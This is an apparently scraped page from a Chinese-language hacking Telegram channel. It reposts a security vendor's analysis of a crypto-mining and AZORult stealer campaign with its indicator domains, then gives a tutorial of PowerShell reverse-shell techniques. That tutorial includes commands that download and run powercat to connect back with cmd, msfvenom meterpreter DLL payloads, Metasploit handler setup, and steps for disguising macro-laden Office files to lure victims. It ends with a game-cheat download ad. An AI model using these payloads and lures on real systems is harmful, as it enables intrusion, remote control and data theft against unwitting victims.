红客解密程序 暗网编程
27.6K subscribers
966 photos
12 videos
1 file
56 links
渗透测试,#删库,数据删除 拿数据库 木马注入 破解,提权,Dns动持
Download Telegram
警惕利用AutoHotKey程序传播的挖矿网络


近日,360安全监测与响应中心接到某企业客户反馈,某台办公机出现了卡顿的现象,同时在系统中发现了多个异常进程,经过溯源关联分析,发现背后是一个近期开始活跃的传播挖矿木马以及窃密木马的黑客团伙,该团伙收集大量破解软件以及实用系统工具,之后捆绑病毒loader,并大量发帖宣传,恶意程序获得执行后,会下载并运行xmrig挖矿程序以及AZORult窃密木马,不仅利用受害者主机资源挖矿牟利,同时还窃取用户的比特币钱包,paypal账号等信息,值得注意的是,此次捕获的恶意程序大量使用了AutoHotKey脚本,大大降低了挖矿团伙的开发成本





0x01:感染过程分析

获得客户同意后,360安全监测与响应中心对被感染主机进行了远程排查,与使用者交流后发现,该主机前一天刚刚重做系统,安装了大量软件,研究人员随后对浏览器下载记录进行检查,发现该主机使用者安全意识较好,软件均为官网下载安装,在对所有软件进行检查,排除供应链污染可能性后,下载历史中一个小工具引起了研究人员的注意,但是该工具使用后已经被删除
样本分析 – 2.exe
2.exe为32位无壳PE文件,使用与1.exe中矿机相同的加载方法,将PE文件dump下分析为AZORult窃密木马,可以窃取受害者浏览器密码,paypal账号,比特币钱包等敏感信息,通过威胁情报关联,找到了一个木马打包的受害者信息,内含大量敏感信息
1
IOC信息
矿池地址及C&C

后给出感染情况统计服务器88.99.66.31在2018年的历史解析,

最可以据此排查

imap.yip.su                                   

mcm.iplogger.com

www.iplogger.co

api.iplogger.com

02ip.ru

enterpriseenrollment.iplogger.ru

iplogger.org

ezstat.ru

office.iplogger.com

blog.iplogger.org

corp.ezstat.ru

cdn-www.ezstat.ru

pub-my.iplogger.com

css.iplogger.ru

www.iplogger.ru

message.ezstat.ru

cdn-www.ezstat.ru

iplogger.co

yip.su

www.iplis.ru

www.iplogger.ru

devqa.iplogger.org

imap.iplogger.com

mail.ezstat.ru

docs.ezstat.ru

static.31.66.99.88.clients.your-server.de

superadmin.maper.info

2no.co

sentry.ezstat.ru

pages.ezstat.ru

m.iplogger.com

de.ezstat.ru

dwww.iplogger.org

iplogger.info

iplogger.blog

plus.ezstat.ru

promod.iplogger.org

api.ezstat.ru

yip.su

onelogin.ezstat.ru

mobile.iplogger.com

support02.maper.info

media2.iplogger.org

qa.ezstat.ru

dashboard.ezstat.ru

prx.ezstat.ru

ipgraber.ru

login.ezstat.ru

wldcrdrcrd.ezstat.ru

dr.iplogger.ru

iplo.ru

support02.maper.info

games.ezstat.ru

partners.ezstat.ru

alfa.maper.info

bes.ezstat.ru

qa.ezstat.ru

yip.su

blog.iplogger.org

jenkins.ezstat.ru

pma.deorg.ru

ease.iplogger.org

ftp.iplogger.com

devtest.iplogger.ru

antispam.iplogger.com

ease.iplogger.com

www.iplogger.org

www.ezstat.ru

apac.ezstat.ru

iplogger.info

awmdm.ezstat.ru

plus.ezstat.ru

pages.ezstat.ru

games.ezstat.ru

cs.ezstat.ru

beta.iplogger.ru

prd.iplogger.ru

aws.ezstat.ru

prix.iplogger.org

live.ezstat.ru

www.02ip.ru

mobicontrol.iplogger.com

vpc.ezstat.ru
powershell反弹shell常见方式

本文整理了通过powershell反弹shell的常见方式。利用powercat、dnscat2、nishang、Empire、PowerSploit、Metasploit、Cobalt strike、powershell自定义函数等方式反弹TCP/UDP/HTTP/HTTPS/ICMP/DNS等类型shell。
测试环境说明
攻击者:KALI2.0 32位 192.168.159.134
攻击者2:Ubuntu 14.04 LTS 192.168.159.129 (仅在dnscat2 反弹DNS shell中使用)
目标机:Windows Server 2008 X64 192.168.159.138

powercat反弹shell
powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat

攻击者(192.168.159.134)开启监听:
nc -lvp 6666
或者使用powercat监听
powercat -l -p 6666

目标机反弹cmd shell:

powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd
Reverse TCP shell
攻击者(192.168.159.134)开启监听:
nc -lvp 6666
利用office 宏反弹shell
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute

生成/tmp/macro 攻击代码后,新建一个word 创建宏
点击“文件”-“宏”-“创建”,删除自带的脚本,复制进去/tmp/macro文件内容,并保存为“Word 97-2003文档(.doc)”或者“启用宏的Word 文档(.docm)”文件,当诱导目标打开,执行宏后,即可成功反弹shell:
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
在word中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装,当诱导目标点击launcher_lltest.xls文件,执行后,即可成功反弹shell
PowerSploit DLL注入反弹shell
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell

1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp

metasploit 设置payload 开启监听

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
metasploit反弹shell
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell

攻击者(192.168.159.134)
This media is not supported in your browser
VIEW IN TELEGRAM
逆战未来
无限子弹[单发枪打完了去补子弹就行]
5倍枪速[枪械射速以及换弹速度]
根目录777权限
大厅执行一次即可
游戏不退全局有效
下载地址:点击下载
#逆战未来 #山海经